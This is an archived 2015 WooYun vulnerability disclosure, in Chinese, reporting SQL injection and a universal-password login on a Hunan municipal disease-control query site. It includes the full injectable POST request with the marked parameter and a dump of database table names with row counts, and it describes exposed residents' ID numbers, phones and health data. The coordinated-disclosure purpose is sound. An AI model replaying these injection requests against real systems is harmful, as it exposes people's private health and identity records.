乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-18: 细节已通知厂商并且等待厂商处理中 2015-10-22: 厂商已经确认,细节仅向厂商公开 2015-11-01: 细节向核心白帽子及相关领域专家公开 2015-11-11: 细节向普通白帽子公开 2015-11-21: 细节向实习白帽子公开 2015-12-06: 细节向公众公开
RT
湖南省浏阳市疾病预防控制中心**.**.**.**
0x01.查询页面存在注入,可用万能密码登陆
0x02可查询全市所有人的居民身份证/工作单位/电话/身体状况等等
可添加管理员
0x03几乎所有查询框均存在注入
POST /TJsearch/jktj_select_do.asp HTTP/1.1Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*Referer: **.**.**.**/TJsearch/jktj_select.aspAccept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: **.**.**.**Content-Length: 562Pragma: no-cacheCookie: ASPSESSIONIDCABBBRDD=OODNKJOAHNMHAAHNJBPPCFDHselect_db=JKTJ&readDb=True&textfield_b_1=&textfield_c_1=&textfield_d_1=&textfield_e_1=&textfield_a_2=&textfield_b_2=&textfield_e_2=&textfield_a_3=&textfield_b_3=&textfield_e_3=&textfield_b_4=&textfield_c_4=&textfield_d_4=&textfield_e_4=&textfield_b_5=&textfield_b_6=&textfield_b_7=&textfield_b_8=&textfield_b_9=&textfield_b_10=&textfield_e_10=&checkbox_11=b&textfield_b_11=123*&textfield_c_11=&textfield_d_11=&textfield_e_11=&textfield_b_12=&textfield_c_12=&textfield_d_12=&textfield_e_12=&textfield_b_14=%C4%D0&textfield_b_15=%BA%CF%B8%F1&Submit.x=28&Submit.y=16
多个参数存在注入,以textfield_b_11为例涉及26个数据库
DBA权限
随便展示一个库的数据量
Database: TJ+-------------------+---------+| Table | Entries |+-------------------+---------+| BARCODEREGISTER_D | 555345 || TJ_EXINFO | 291367 || TJ_UPLOADLOG | 147973 || JKTJ_JTSM | 138642 || JKTJ_FEED | 127467 || JKTJ_J | 92799 || BARCODEREGISTER_M | 76928 || RECEIPTDTL_J | 67767 || JKTJ_FEEM | 67598 || TJ_EXINFO_T | 52348 || ONLINEUSERS | 44426 || TJ_SENDTUBED | 30862 || T_SENDLIST | 21222 || CODE_NO | 5586 || JK_EDZYS | 5477 || SYSMENUACCESSCTRL | 5441 || TUBECHECK_J | 4655 || GANMODIHIS_J | 1462 || JKTJ0224BK_J | 986 || LABREPORT_G | 976 || SYSCONSTRAINTS | 816 || JKTJ0224_J | 696 || LABREPORT_C | 628 || DBPYMODIHIS_J | 371 || TJ_SENDTUBEM | 273 || TJ_CARDPRINT | 271 || TJ_STREET | 148 || DAYCHARGE_J | 147 || SYSMENU | 100 || J_JCZL | 88 || DWM_O | 67 || LABMONTH_J | 64 || DATEUSE | 57 || TMP_HEALTH | 51 || IP_TBC_FIELDS | 46 || LABDAILY_J | 32 || JKTJ_DAY_J | 29 || JKTJSTAT_DJ | 29 || DOCTORS_J | 27 || RECEIPT_J | 26 || JKTJSTAT_QJ | 25 || OPERATOR | 25 || SYSSEGMENTS | 24 || PBCATEDT | 21 || PBCATFMT | 20 || HW_TBS_ACTCONDD | 18 || JKTJ_ITEM | 16 || DATALEXICON | 14 || LED_CONTENT | 14 || HP_TBC_CFGITEMS | 11 || JKTJ_RESULT | 10 || TJ_CHARGE_DEPT | 10 || HW_TBS_ACTCONDDEF | 9 || GZ_J | 8 || JKTJ_GROUPD | 8 || DWXZ_J | 7 || TJ_CHARGE_ITEM | 7 || DEPT | 6 || HW_TBS_ACTDEF | 6 || HW_TBS_PROCDEFD | 6 || JKTJ_GROUP | 6 || TMP_AREAGZ | 5 || DWM_K | 4 || JKTJSTAT_FJ | 4 || MZ_J | 3 || SYSPARAM | 3 || HW_TBS_PROCDEFM | 1 || JKTJ_JFZ | 1 || WHCD_J | 1 |+-------------------+---------+
过滤参数
危害等级:高
漏洞Rank:10
确认时间:2015-10-22 14:27
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无